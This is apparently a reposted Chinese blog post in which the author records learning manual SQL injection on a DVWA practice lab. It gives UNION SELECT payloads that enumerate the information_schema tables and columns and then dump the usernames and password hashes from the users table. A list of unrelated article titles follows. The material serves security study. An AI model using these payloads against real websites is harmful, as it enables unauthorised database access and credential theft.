搭建dvwa环境来测试手工注入,让注入更清楚
来源:互联网 发布:数据库表的增删改查 编辑:程序博客网 时间:2024/05/02 04:31
首先还是手工检测注入点单引号在id=1后面 报错有可能为注入点 然后为了保险就再用and 1=1页面正常 and 1=2 页面错误 ,说明存在注入点的然后再进行获取显示位用orderby 语法 判断 判断出来为两个显示位字段 然后再用联合查询 union select语法用union select 联合查询来查询当前数据库 、用户、版本信息
集训构造union select语句,来查询正在使用中的用户user()、 数据库database()、数据库版本version()、服务器操作系统@@version_compile_os,用以下语句;union select user(),database()+–+查询网站用户名和密码 MySQL5.0以 上,information_schema存储所有数据库下的表名和列名信息,例如查询 information_schema数据库名下的表名tables的信息(条件;tables_schema=0x64767761数据名为dvwa)
information_schema .tables:infoemation_schema数据库名下表名tables记录所有数据库名下的所有标明信息的表
例子 http://www.*.com:880/dvwa/vulnerabilities/sqli/?id=1’UNION SELECT 1,group_concat(table_name) from information_schema.tables where table_schema=0x64767761+–+
接着查询表名users下的所有列名信息(注:information_schema.columns是记录所有数据库名下的所有列名信息的表
例子 http://www.xxx.com/dvwa/?id=1’ UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273+–+注意0x7573657273为user的16进制值
接着查询user和password http://www.xxx.com/dvwa/?id=1’ UNION SELECT user,password from users+–+
好了 本人手工注入也是菜 只是发表出来让自己记着是怎么做的
- 搭建dvwa环境来测试手工注入,让注入更清楚
- DVWA之php+mysql手工注入
- SQL手工注入测试
- Dvwa渗透测试之命令注入笔记
- DVWA漏洞测试之SQL注入
- 2003搭建DVWA测试环境
- SQL注入之DVWA平台测试mysql注入
- 安全测试-手工SQL注入
- dvwa sql 注入高级
- DVWA 之命令注入
- 手工注入
- 手工注入
- 手工注入
- 手工注入方法,方便大家测试注入点
- php+mysql注入环境搭建及测试(上)
- DVWA下的SQL注入
- ASP.NET MVC3 让依赖注入来的更简单(新补充了Ninject示例)
- 黑客注入之手工注入
- 单例模式(Singleton)的6种实现
- Android Studio cmake和jni的一些坑
- Windows 10 下载、安装、破解 SolidWorks 2012 Sp5.0 软件 图文教程
- 一个对阅读、调试内核代码非常实用的函数 --- print_symbol
- 嵌入式linux web服务器
- 搭建dvwa环境来测试手工注入,让注入更清楚
- UVA
- 操作Checkbox标签
- MAC TensorFlow安装与更新
- pta 习题集5-19 列车厢调度
- 软件工程(1)
- 第一篇博文:我的软件工程课程目标
- java提高篇(三十)-----Iterator,与enumeration的区别。
- windows下配置mongodb数据库